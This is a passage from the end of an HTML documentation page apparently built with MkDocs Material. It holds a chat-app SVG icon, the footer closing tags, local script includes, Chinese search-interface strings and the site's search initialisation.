        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 576 512"><path d="M385.2 167.6c6.4 0 12.6.3 18.8 1.1C387.4 90.3 303.3 32 207.7 32 100.5 32 13 104.8 13 197.4c0 53.4 29.3 97.5 77.9 131.6l-19.3 58.6 68-34.1c24.4 4.8 43.8 9.7 68.2 9.7 6.2 0 12.1-.3 18.3-.8-4-12.9-6.2-26.6-6.2-40.8-.1-84.9 72.9-154 165.3-154zm-104.5-52.9c14.5 0 24.2 9.7 24.2 24.4 0 14.5-9.7 24.2-24.2 24.2-14.8 0-29.3-9.7-29.3-24.2.1-14.7 14.6-24.4 29.3-24.4zm-136.4 48.6c-14.5 0-29.3-9.7-29.3-24.2 0-14.8 14.8-24.4 29.3-24.4 14.8 0 24.4 9.7 24.4 24.4 0 14.6-9.6 24.2-24.4 24.2zM563 319.4c0-77.9-77.9-141.3-165.4-141.3-92.7 0-165.4 63.4-165.4 141.3S305 460.7 397.6 460.7c19.3 0 38.9-5.1 58.6-9.9l53.4 29.3-14.8-48.6C534 402.1 563 363.2 563 319.4zm-219.1-24.5c-9.7 0-19.3-9.7-19.3-19.6 0-9.7 9.7-19.3 19.3-19.3 14.8 0 24.4 9.7 24.4 19.3 0 10-9.7 19.6-24.4 19.6zm107.1 0c-9.7 0-19.3-9.7-19.3-19.6 0-9.7 9.7-19.3 19.3-19.3 14.5 0 24.4 9.7 24.4 19.3.1 10-9.9 19.6-24.4 19.6z"/></svg>
      </a>
    
  </div>

    </div>
  </div>
</footer>
      
    </div>
    
      <script src="../../../assets/javascripts/vendor.08c56446.min.js"></script>
      <script src="../../../assets/javascripts/bundle.6ced434e.min.js"></script><script id="__lang" type="application/json">{"clipboard.copy": "\u590d\u5236", "clipboard.copied": "\u5df2\u590d\u5236", "search.config.lang": "ja", "search.config.pipeline": "trimmer, stemmer", "search.config.separator": "[\\uff0c\\u3002]+", "search.placeholder": "\u641c\u7d22", "search.result.placeholder": "\u952e\u5165\u4ee5\u5f00\u59cb\u641c\u7d22", "search.result.none": "\u6ca1\u6709\u627e\u5230\u7b26\u5408\u6761\u4ef6\u7684\u7ed3\u679c", "search.result.one": "\u627e\u5230 1 \u4e2a\u7b26\u5408\u6761\u4ef6\u7684\u7ed3\u679c", "search.result.other": "# \u4e2a\u7b26\u5408\u6761\u4ef6\u7684\u7ed3\u679c", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.term.missing": "Missing"}</script>
      
      <script>
        app = initialize({
          base: "../../..",
          features: ['navigation.tabs', 'search.highlight', 'search.suggest', 'header.autohide'],
          search: Object.assign({
            worker: "../../../assets/javascripts/worker/search.8c7e0a7e.min.js"
          }, typeof search !== "undefined" && search)
        })
      </script>
      
    
  </body>
</html>